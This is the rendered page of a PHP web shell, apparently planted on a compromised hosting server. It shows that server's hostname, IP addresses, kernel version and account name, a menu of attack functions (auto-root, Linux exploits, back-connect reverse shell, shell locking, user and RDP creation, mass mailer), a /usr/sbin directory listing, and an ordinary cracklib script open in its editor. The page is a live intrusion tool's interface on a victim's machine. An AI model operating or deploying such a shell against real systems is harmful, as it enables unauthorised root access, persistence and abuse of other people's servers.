Linux server.bornosky.com 4.18.0-477.13.1.lve.el8.x86_64 #1 SMP Thu Jun 1 16:40:47 EDT 2023 x86_64
Apache
: 95.217.200.235 | : 18.116.81.110
Cant Read [ /etc/named.conf ]
7.3.33
aggscedu
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
HASH IDENTIFIER
README
+ Create Folder
+ Create File
/
usr /
sbin /
[ HOME SHELL ]
Name
Size
Permission
Action
chroot
41.52
KB
-rwxr-xr-x
cloudlinux-selector
654
B
-rwxr-xr-x
consoletype
11.86
KB
-rwxr-xr-x
cracklib-check
13.05
KB
-rwxr-xr-x
cracklib-format
251
B
-rwxr-xr-x
cracklib-packer
13.05
KB
-rwxr-xr-x
cracklib-unpacker
9.03
KB
-rwxr-xr-x
create-cracklib-dict
990
B
-rwxr-xr-x
ddns-confgen
20.46
KB
-rwxr-xr-x
dnssec-checkds
936
B
-rwxr-xr-x
dnssec-coverage
938
B
-rwxr-xr-x
dnssec-dsfromkey
60.84
KB
-rwxr-xr-x
dnssec-importkey
60.84
KB
-rwxr-xr-x
dnssec-keyfromlabel
64.74
KB
-rwxr-xr-x
dnssec-keygen
72.84
KB
-rwxr-xr-x
dnssec-keymgr
934
B
-rwxr-xr-x
dnssec-revoke
56.73
KB
-rwxr-xr-x
dnssec-settime
60.84
KB
-rwxr-xr-x
dnssec-signzone
117.2
KB
-rwxr-xr-x
dnssec-verify
52.84
KB
-rwxr-xr-x
exim
1.02
KB
-rwxr-xr-x
faillock
20.56
KB
-rwxr-xr-x
genrandom
12.38
KB
-rwxr-xr-x
ip
664.45
KB
-rwxr-xr-x
isc-hmac-fixup
11.86
KB
-rwxr-xr-x
ldconfig
937.27
KB
-rwxr-xr-x
mkhomedir_helper
24.43
KB
-rwxr-xr-x
named-checkzone
36.63
KB
-rwxr-xr-x
named-compilezone
36.63
KB
-rwxr-xr-x
nsec3hash
12.29
KB
-rwxr-xr-x
pam_console_apply
45.23
KB
-rwxr-xr-x
pam_timestamp_check
11.9
KB
-rwxr-xr-x
pluginviewer
20.57
KB
-rwxr-xr-x
proxyexec
21.17
KB
-r-xr-xr-x
pwhistory_helper
20.47
KB
-rwxr-xr-x
saslauthd
94.42
KB
-rwxr-xr-x
sasldblistusers2
20.77
KB
-rwxr-xr-x
saslpasswd2
16.42
KB
-rwxr-xr-x
sendmail
1.02
KB
-rwxr-xr-x
snmpd
32.45
KB
-rwxr-xr-x
snmptrapd
32.6
KB
-rwxr-xr-x
testsaslauthd
16.66
KB
-rwxr-xr-x
tmpwatch
35.47
KB
-rwxr-xr-x
tsig-keygen
20.46
KB
-rwxr-xr-x
unix_chkpwd
36.9
KB
-rwxr-xr-x
unix_update
36.89
KB
-rwx------
Delete
Unzip
Zip
${this.title}
Close
Code Editor : create-cracklib-dict
#!/bin/sh usage() { cat <<-EOF Usage: create-cracklib-dict [options] wordlist ... This script takes one or more word list files as arguments and converts them into cracklib dictionaries for use by password checking programs. The results are placed in the default compiled-in dictionary location. If you wish to store the dictionary in a different location, use the cracklib-format and cracklib-packer commands directly. Options: -o, --output <file> Alternative output file for cracklib-packer -h, --help This help output Example: create-cracklib-dict /usr/share/words EOF if [ -n "$*" ] ; then echo 1>&2 echo "Error: $*" 1>&2 exit 1 else exit 0 fi } output="" while [ -n "$1" ] ; do case $1 in -o|--output) output=$2; shift;; -h|--help) usage;; --) break;; -*) usage "unknown option '$*'";; *) break;; esac shift done [ -z "$*" ] && usage exec cracklib-format "$@" | cracklib-packer ${output}
Close